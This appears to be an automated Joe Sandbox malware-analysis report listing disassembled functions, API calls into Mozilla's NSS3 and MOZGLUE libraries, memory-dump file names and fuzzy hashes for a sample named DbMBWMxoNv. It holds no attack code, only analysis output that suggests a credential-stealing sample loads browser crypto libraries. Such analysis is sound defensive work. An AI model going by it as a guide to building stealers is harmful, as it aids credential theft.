Part of subcall function 6CFA0BE0: malloc.MOZGLUE(6CF98D2D,?,00000000,?), ref: 6CFA0BF8
Part of subcall function 6CFA0BE0: TlsGetValue.KERNEL32(6CF98D2D,?,00000000,?), ref: 6CFA0C15

PR_SetError.NSS3(FFFFE009,00000000), ref: 6CF9DE80

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
String ID:
API String ID: 3725328900-0
Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction ID: 6eb2eab9b88ea7f33c7dfe5d13a31c2671fde03c828b79e72833e4489af7518d
Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction Fuzzy Hash: FB31A4B59017429BFB00DF56D880692F7E4BFA531CB24822AD81987B01E771F5A4CB90

Function 6CF41EC0 Relevance: 6.1, APIs: 4, Instructions: 74timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,00000000,00000000,?,6CF44C64,?,-00000004), ref: 6CF41EE2

Part of subcall function 6CFA1820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6CF41D97,?,?), ref: 6CFA1836

DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6CF44C64,?,-00000004), ref: 6CF41F13
DER_DecodeTimeChoice_Util.NSS3(?,6CF44CA0,?,?,?,?,?,?,00000000,00000000,?,6CF44C64,?,-00000004), ref: 6CF41F37
DER_DecodeTimeChoice_Util.NSS3(?,6CF44C1C,?,?,?,?,?,?,?,?,00000000,00000000,?,6CF44C64,?,-00000004), ref: 6CF41F53

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: TimeUtil$Choice_Decode$GeneralizedTime_
String ID:
API String ID: 3216063065-0
Opcode ID: f74e517f071c936f5647a0d20be57f2e7190db5d0f8e3f3db9a68ae64d9bb8f0
Instruction ID: 0a43fc157221ab46644b57fc6de70e742daa015dd94047a6a454545f69f667e1
Opcode Fuzzy Hash: f74e517f071c936f5647a0d20be57f2e7190db5d0f8e3f3db9a68ae64d9bb8f0
Instruction Fuzzy Hash: B721A776504305EFC700CF65DD00ADBBBE9AB84659F00C929E954C3A41F330E569C7D2

Function 6CFB2DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CFB2E08

Part of subcall function 6CFA14C0: TlsGetValue.KERNEL32 ref: 6CFA14E0
Part of subcall function 6CFA14C0: EnterCriticalSection.KERNEL32 ref: 6CFA14F5
Part of subcall function 6CFA14C0: PR_Unlock.NSS3 ref: 6CFA150D

PORT_NewArena_Util.NSS3(00000400), ref: 6CFB2E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6CFB2E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CFB2E95

Part of subcall function 6CFA1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CF488A4,00000000,00000000), ref: 6CFA1228
Part of subcall function 6CFA1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CFA1238
Part of subcall function 6CFA1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CF488A4,00000000,00000000), ref: 6CFA124B
Part of subcall function 6CFA1200: PR_CallOnce.NSS3(6D0A2AA4,6CFA12D0,00000000,00000000,00000000,?,6CF488A4,00000000,00000000), ref: 6CFA125D
Part of subcall function 6CFA1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CFA126F
Part of subcall function 6CFA1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CFA1280
Part of subcall function 6CFA1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CFA128E
Part of subcall function 6CFA1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CFA129A
Part of subcall function 6CFA1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CFA12A1

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: 08809b506d7af01323d8b6a162362aa5184588105b14db4067d670b8f2365979
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: 7F21D7B5D003458BE700CF569D487EB7764AF9130CF114269FD187B752F7B2D5948291

Function 6CF6ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6CF6ACC2

Part of subcall function 6CF42F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CF42F0A
Part of subcall function 6CF42F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CF42F1D

Part of subcall function 6CF42AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6CF40A1B,00000000), ref: 6CF42AF0
Part of subcall function 6CF42AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF42B11

CERT_DestroyCertList.NSS3(00000000), ref: 6CF6AD5E

Part of subcall function 6CF857D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CF4B41E,00000000,00000000,?,00000000,?,6CF4B41E,00000000,00000000,00000001,?), ref: 6CF857E0
Part of subcall function 6CF857D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CF85843

CERT_DestroyCertList.NSS3(?), ref: 6CF6AD36

Part of subcall function 6CF42F50: CERT_DestroyCertificate.NSS3(?), ref: 6CF42F65
Part of subcall function 6CF42F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CF42F83

free.MOZGLUE(?), ref: 6CF6AD4F

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: 6607f9560887b877d8a4124ad21bca9b5f1b05e99398c9080be65ef14e1117c5
Instruction ID: ea10d14eca13ddc00a061c32020be6a3f42e6333484043b3d7d9e9e67a457e22
Opcode Fuzzy Hash: 6607f9560887b877d8a4124ad21bca9b5f1b05e99398c9080be65ef14e1117c5
Instruction Fuzzy Hash: 5521A5B1D002189BEB10DF65D8056EEBBF4EF05218F459068DC05BBA11FB31AA59CBA1

Function 6CF93C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CF93C9E
EnterCriticalSection.KERNEL32(?), ref: 6CF93CAE
PR_Unlock.NSS3(?), ref: 6CF93CEA
PR_SetError.NSS3(00000000,00000000), ref: 6CF93D02

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: fbf42bed69ff711e16afb142038f1439d9be690fbdf249d4480059883fd6d8ef
Instruction ID: 008ebaaf01b1be55b2ecc0d1ad0ea804ebd30caa8feec7696f8c37c55abb6286
Opcode Fuzzy Hash: fbf42bed69ff711e16afb142038f1439d9be690fbdf249d4480059883fd6d8ef
Instruction Fuzzy Hash: 8611B179900618AFEB009F24D848B9A3BB8EF49368F194065ED088B712E730ED54CBE1

Function 6CF9ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6CF9F0AD,6CF9F150,?,6CF9F150,?,?,?), ref: 6CF9ECBA

Part of subcall function 6CFA0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CF487ED,00000800,6CF3EF74,00000000), ref: 6CFA1000
Part of subcall function 6CFA0FF0: PR_NewLock.NSS3(?,00000800,6CF3EF74,00000000), ref: 6CFA1016
Part of subcall function 6CFA0FF0: PL_InitArenaPool.NSS3(00000000,security,6CF487ED,00000008,?,00000800,6CF3EF74,00000000), ref: 6CFA102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6CF9ECD1

Part of subcall function 6CFA10C0: TlsGetValue.KERNEL32(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA10F3
Part of subcall function 6CFA10C0: EnterCriticalSection.KERNEL32(?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA110C
Part of subcall function 6CFA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA1141
Part of subcall function 6CFA10C0: PR_Unlock.NSS3(?,?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA1182
Part of subcall function 6CFA10C0: TlsGetValue.KERNEL32(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6CF9ED02

Part of subcall function 6CFA10C0: PL_ArenaAllocate.NSS3(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6CF9ED5A

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: 59d1071e6a3677e97d7561c2418c121fd66e5d0e52f991b415687e52aee2e8eb
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: 1421A1B5E007429BFB00CF26D944B52B7E4BFE5348F25C21AE81C87A61EB71E594C6D0

Function 6CFCEDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6CFB7FFA,?,6CFB9767,?,8B7874C0,0000A48E), ref: 6CFCEDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6CFB7FFA,?,6CFB9767,?,8B7874C0,0000A48E), ref: 6CFCEDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6CFB7FFA,?,6CFB9767,?,8B7874C0,0000A48E), ref: 6CFCEE14

Part of subcall function 6CFA0BE0: malloc.MOZGLUE(6CF98D2D,?,00000000,?), ref: 6CFA0BF8
Part of subcall function 6CFA0BE0: TlsGetValue.KERNEL32(6CF98D2D,?,00000000,?), ref: 6CFA0C15

memcpy.VCRUNTIME140(?,?,6CFB9767,00000000,00000000,6CFB7FFA,?,6CFB9767,?,8B7874C0,0000A48E), ref: 6CFCEE33

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: 523347b63048a5f7c6ece3c7dd2ebf6cbbfa3b2eebed045404b482307f6f13d4
Instruction ID: 349cb343492fb286091c547f8ae4129e921b0d38a638d1fc4bbfa7239b91cc34
Opcode Fuzzy Hash: 523347b63048a5f7c6ece3c7dd2ebf6cbbfa3b2eebed045404b482307f6f13d4
Instruction Fuzzy Hash: 8311A3B1B04707ABE7109E65DC85B47B3A8EB0439DF214531E919C7A40E330E464C7E2

Function 6CF68DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CF68DE7
EnterCriticalSection.KERNEL32 ref: 6CF68DFC
PR_Unlock.NSS3 ref: 6CF68E2D
PR_SetError.NSS3 ref: 6CF68E49

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 2938d4d00ced4dd665fafc7072fe68cc9abe25212a856a175f0a56e48439a6f5
Instruction ID: 49e49b2c5c57275759b1ad8e99d0b9931ddde287b0389f7e24d4afac08f7af2c
Opcode Fuzzy Hash: 2938d4d00ced4dd665fafc7072fe68cc9abe25212a856a175f0a56e48439a6f5
Instruction Fuzzy Hash: 00115175905A149FD700AF79C54869ABBF4FF45354F05496ADC88DBB00E730E854CBD2

Function 00417B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 00417B40
HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DE8,00000000,?), ref: 00417B47
GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 00417B54
wsprintfA.USER32 ref: 00417B83

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
Instruction ID: c3980473cd5af67d898b1e7796d4e9c7fbcb3b6a311921eeb92eb57329937120
Opcode Fuzzy Hash: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
Instruction Fuzzy Hash: D4112AB2D09218ABCB14DBC9DD45BBEB7B9EB4CB11F10411AF605A2280E3395940C7B5

Function 6CFEAC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6CFD5F17,?,?,?,?,?,?,?,?,6CFDAAD4), ref: 6CFEAC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6CFD5F17,?,?,?,?,?,?,?,?,6CFDAAD4), ref: 6CFEACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6CFDAAD4), ref: 6CFEACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6CFDAAD4), ref: 6CFEACDB

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: 8e62238c04e3fc9b9c7cbf9438dbec9ddf54bcc862e56289f3fc43759b7bf37d
Instruction ID: 1535a3787d52eb00c886a104ba95f8cf1e2ce6935341818f4f309cfe336ed942
Opcode Fuzzy Hash: 8e62238c04e3fc9b9c7cbf9438dbec9ddf54bcc862e56289f3fc43759b7bf37d
Instruction Fuzzy Hash: CE019EB1A01B01ABE710DF29E908753BBF8BF04659B004839D85AC3E00E730F015CB91

Function 6CF51DD0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

CERT_DestroyCertificate.NSS3(?), ref: 6CF51DFB

Part of subcall function 6CF495B0: TlsGetValue.KERNEL32(00000000,?,6CF600D2,00000000), ref: 6CF495D2
Part of subcall function 6CF495B0: EnterCriticalSection.KERNEL32(?,?,?,6CF600D2,00000000), ref: 6CF495E7
Part of subcall function 6CF495B0: PR_Unlock.NSS3(?,?,?,?,6CF600D2,00000000), ref: 6CF49605

PR_EnterMonitor.NSS3 ref: 6CF51E09

Part of subcall function 6D009090: TlsGetValue.KERNEL32 ref: 6D0090AB
Part of subcall function 6D009090: TlsGetValue.KERNEL32 ref: 6D0090C9
Part of subcall function 6D009090: EnterCriticalSection.KERNEL32 ref: 6D0090E5
Part of subcall function 6D009090: TlsGetValue.KERNEL32 ref: 6D009116
Part of subcall function 6D009090: LeaveCriticalSection.KERNEL32 ref: 6D00913F

Part of subcall function 6CF4E190: PR_EnterMonitor.NSS3(?,?,6CF4E175), ref: 6CF4E19C
Part of subcall function 6CF4E190: PR_EnterMonitor.NSS3(6CF4E175), ref: 6CF4E1AA
Part of subcall function 6CF4E190: PR_ExitMonitor.NSS3 ref: 6CF4E208
Part of subcall function 6CF4E190: PL_HashTableRemove.NSS3(?), ref: 6CF4E219
Part of subcall function 6CF4E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CF4E231
Part of subcall function 6CF4E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CF4E249
Part of subcall function 6CF4E190: PR_ExitMonitor.NSS3 ref: 6CF4E257

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CF51E37
PR_ExitMonitor.NSS3 ref: 6CF51E4A

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
String ID:
API String ID: 499896158-0
Opcode ID: cccbf1e30d8f2f7452ff98778b165710d59dd37e546c322ea43ca80e1989b972
Instruction ID: 85195dc499fc0de4fbabc14190ed9b502f65b89e8749df724b10faa20cb1b86f
Opcode Fuzzy Hash: cccbf1e30d8f2f7452ff98778b165710d59dd37e546c322ea43ca80e1989b972
Instruction Fuzzy Hash: 9601A772B44515A7FB005F26EC10F8B77A4AB6174CF558031E61897A52E731F834CBD1

Function 6CF51D50 Relevance: 6.0, APIs: 4, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CF51D75
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CF51D89
PORT_ZAlloc_Util.NSS3(00000010), ref: 6CF51D9C
free.MOZGLUE(00000000), ref: 6CF51DB8

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Alloc_Util$Errorfree
String ID:
API String ID: 939066016-0
Opcode ID: cd9a64838c068de982788afe11d84611c7c4919a48f456aab85579f96ea386c6
Instruction ID: ebd61da885dc924916131a05c4a4964b84aa37344195a6737e28d3394714b63d
Opcode Fuzzy Hash: cd9a64838c068de982788afe11d84611c7c4919a48f456aab85579f96ea386c6
Instruction Fuzzy Hash: 4DF02DB3A0121067FF201F596C41B877658AFA1758F518235DF1D4BB41DB70F81486E2

Function 6CFEAC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,6CFD5D40,00000000,?,?,6CFC6AC6,6CFD639C), ref: 6CFEAC2D

Part of subcall function 6CF8ADC0: TlsGetValue.KERNEL32(?,6CF6CDBB,?,6CF6D079,00000000,00000001), ref: 6CF8AE10
Part of subcall function 6CF8ADC0: EnterCriticalSection.KERNEL32(?,?,6CF6CDBB,?,6CF6D079,00000000,00000001), ref: 6CF8AE24
Part of subcall function 6CF8ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CF6D079,00000000,00000001), ref: 6CF8AE5A
Part of subcall function 6CF8ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CF6CDBB,?,6CF6D079,00000000,00000001), ref: 6CF8AE6F
Part of subcall function 6CF8ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CF6CDBB,?,6CF6D079,00000000,00000001), ref: 6CF8AE7F
